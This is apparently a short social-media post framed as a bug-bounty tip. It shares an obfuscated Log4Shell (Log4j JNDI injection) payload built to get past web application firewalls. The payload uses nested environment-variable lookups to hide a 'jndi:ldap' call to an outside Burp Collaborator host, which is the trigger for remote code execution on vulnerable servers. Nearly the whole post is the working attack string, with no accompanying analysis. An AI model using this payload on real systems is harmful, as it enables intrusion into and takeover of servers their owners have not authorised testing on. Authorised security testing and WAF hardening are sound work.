. @BountyOverflow Found a bypass working for a few WAF

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip

credits: @BountyOverflow https://t.co/eCScz6utK2